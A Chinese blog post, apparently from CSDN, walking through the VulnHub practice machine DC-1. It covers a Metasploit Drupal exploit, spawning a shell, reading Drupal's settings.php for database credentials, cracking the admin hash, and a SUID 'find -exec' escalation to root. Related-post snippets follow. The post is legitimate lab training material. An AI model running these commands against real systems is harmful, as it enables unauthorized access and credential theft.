靶机 DC_1

已于 2023-10-22 15:27:06 修改
阅读量160 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: chrome 前端 php 网络安全 linux 安全 网络
于 2023-10-22 15:26:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133973675
版权

DC_1

信息搜集

存活检测

image-20231022135843731

详细扫描

网页目录扫描

image-20231022142423026

网页信息搜集

  • cms 为 Drupal

    image-20231022140031062

    image-20231022140204611

    image-20231022140211818

漏洞利用

  • 使用 msf 搜索 drupal 的漏洞

    启动

    msfconsole

    搜索

    search drupal

    image-20231022142917455

  • 尝试编号为 0 的漏洞

    image-20231022143602280

    失败

  • 利用编号为 1 的漏洞

    use 1

    查看需要配置的选项

    show options

    image-20231022143040490

    设置目标 ip

    set rhost 10.4.7.145

    启动

    run

  • 成功建立连接

    image-20231022143806965

  • 获取 shell 权限

    shell

    image-20231022143918234

  • 回显提示符

    python -c 'import pty;pty.spawn("/bin/bash")'

    image-20231022143959796

  • 第一个 flag

    image-20231022144047189

  • 查看 drupal 默认配置文件

    路径

    /var/www/sites/default

    cat settings.php

    image-20231022145527644

数据库登录

  • 在 drupal 配置文件中查找到了第二个 flag 以及数据库的账密信息

    用户名:dbuser
密码:R0ck3t

    image-20231022145625466

  • 成功登录数据库

    image-20231022145936963

  • 搜集有用信息

    image-20231022150028752

  • 查看 users 表

    image-20231022150654792

  • md5 解密

    密码为 53cr3t

    image-20231022150630553

  • admin 登录

    image-20231022150746661

    在 content 目录下拿到第三个 flag

    image-20231022150828508

  • 提示 perms find -exec

提权

  • 查找具有 suid 权限的命令

    具有 suid 权限的命令在使用时会以命令所有者的权限运行

    命令的所有者一般为 root

    find / -perm -4000 2>/dev/null

    image-20231022151340602

  • find 提权

    find \ a -exec 'bash' \;

    image-20231022151648735

  • bash 提权失败,尝试使用 sh

    image-20231022151804911

    成功 root

  • final flag

    image-20231022152402407

总结

  • Metasploit 漏洞利用
  • find 提权
gjl_
关注
专栏目录
vulnhub靶机实战_DC-2
Varin
06-03 756
vulnhub靶机实战_DC-2
vulnhub靶机实战_DC-1
Varin
06-02 435
【代码】vulnhub靶机实战_DC-1。
DC1--靶机实操详解
qq_61802750的博客
08-02 581
111端口是一个rpcbind 2-4服务,这个服务存在一个漏洞,该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放;特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取隐藏中的东西。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。一个是修改admin的密码,一个是增加一个admin权限的用户。
靶机DC-1 WP
m0_66638011的博客
05-11 1837
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
vulnhub靶机实战_DC-8
Varin
08-06 755
VulnHub是一个提供渗透测试练习环境的平台。在VulnHub靶机实战中,参与者需要在一个模拟的真实环境中识别和利用安全漏洞。这些靶机通常模仿企业网络或特定操作系统,并包含多种类型的漏洞,如弱密码、配置错误的服务、未打补丁的应用程序等。 实战过程中,参与者使用各种工具和技术来发现漏洞,例如网络扫描、服务识别、漏洞扫描等。随后,利用这些漏洞获取访问权限,逐步提升权限直至获得系统控制权。这类实战有助于提高网络安全技能和对攻击向量的理解。
靶机DC-1攻略
weixin_43179779的博客
10-07 1159
dc-1靶机靶机攻略
vulnhub靶机DC1
weixin_52450702的博客
10-29 1012
靶机DC1IP:192.168.70.160。
DC系列靶机1通关教程_dc1 靶机(1)
2401_84520332的博客
05-16 281
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
vulnhub靶机实战_DC-4
Varin
06-05 854
【代码】vulnhub靶机实战_DC-4。
Linux网络编程
weixin_43364551的博客
10-04 946
主要介绍了自学过程中的一些网略编程知识,包括进程相关,TCP/IP,网络I/O等。
linux中bashrc和profile环境变量在Shell编程变量的传递作用
Climbman的博客
10-02 384
在一个 shell 会话中使用export设置了一个环境变量,并且这个环境变量被写入了启动文件(如.bashrc、.profile等),那么在下次打开新的 shell 会话时,这个环境变量可能会被重新加载,从而在一定程度上实现了变量在不同 shell 会话之间的共享。环境变量可以在脚本内的任何地方被访问,并且如果通过适当的方式设置,还可以被该脚本启动的子进程访问。,不同的 shell 脚本在执行时是相互独立的实体,一个脚本中定义的变量在另一个脚本中是不可访问的。在 Linux 系统中,
Chrome 浏览器:现代网络浏览的先锋
wjs2024的博客
10-06 547
Chrome 浏览器,由谷歌公司开发的一款快速、简单且安全网络浏览器,自2008年发布以来,已经成为全球最受欢迎的浏览器之一。本文将深入探讨 Chrome 浏览器的特点、功能、发展历程以及其对现代网络浏览的影响。
shell基础知识(历史命令)
2301_82330629的博客
10-08 704
这可以让你将命令的输出保存到文件中,或者从文件读取输入,甚至可以将一个命令的输出作为另一个命令的输入。当我们在linux中执行命令时,执行过的每一条命令都会被保存到家目录的.bash_history文件中,需要注意的是:只有当用户正常退出当前shell时,在当前shell中运行的命令才会保存至.bash_history文件中。#在上面的例子中,出现一个新的知识点,就是多个被暂停的任务会有编号,使用jobs命令可以看到两个任务,使用bg命令或者fg命令时,需要在后面加上编号。
Chrome无法拖入加载.crx扩展文件(以IDM为例)
zixingcai的博客
09-29 553
加载已加压的扩展程序。
可以自动点击网页按钮的 Chrome 插件(manifest_v3 20241008)
最新发布
ddzr972435946的博客
10-08 348
2、本项目涉及到的这个 vue 单页应用的网址中是包含“#”号的。在 manifest.json 配置文件中,想在网址中填带“#”的网址也是没用的,插件不支持。1、调试时 background.js 的 console.log 的输出可以在浏览器插件页面(如下图的按钮点进去)中看到。content-script1.js 的日志输出是在网页打开后,打开“开发者工具”的控制台,里面可以看到。分享那个这个案例的意义在于,vue 单页应用不同于一般的网页,他有很多事件是不触发的,需要自己想办法处理。
如何在 Kali Linux 上安装 Google Chrome 浏览器
cuisidong1997的博客
10-01 792
尽管 Google Chrome 浏览器存在一些隐私问题,但许多互联网冲浪者还是选择使用此浏览器,因为几乎所有互联网浏览器都指出了隐私问题。Google Chrome 是最流行的网络浏览器之一,可在许多不同的设备上使用。在本教程中,我们将逐步介绍如何在 Kali Linux 上安装 Google Chrome、使其保持最新状态以及将其设置为默认 Web 浏览器。还应该提到的是,执行以下两个命令将升级 Kali Linux 系统中的所有软件包,并且还将更新 Google Chrome 浏览器软件包。
Chromium 关闭 Google Chrome 后继续运行后台应用功能分析c++
jangdong的专栏
10-04 637
5、注意extensions\browser\extension_function_histogram_value.h中与chrome\browser\extensions\api\settings_private\settings_private_api.h中类名的对应关系,否则关联失败。3、该类注册在out\Debug\gen\chrome\browser\extensions\api\generated_api_registration.cc。)去掉Function之后大写!
前端的全栈混合之路Meteor篇:3.0新版本介绍
分享有趣的、贴近生活的CS知识
10-01 1149
Meteor全栈框架3.0版本终于稳定下来了,它的效果约等于webpack+vue+express+socket.io+mongodb+npm+uniapp,学一个搞定全套,值得学习了解下,最后找到适合于自己的技术栈。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值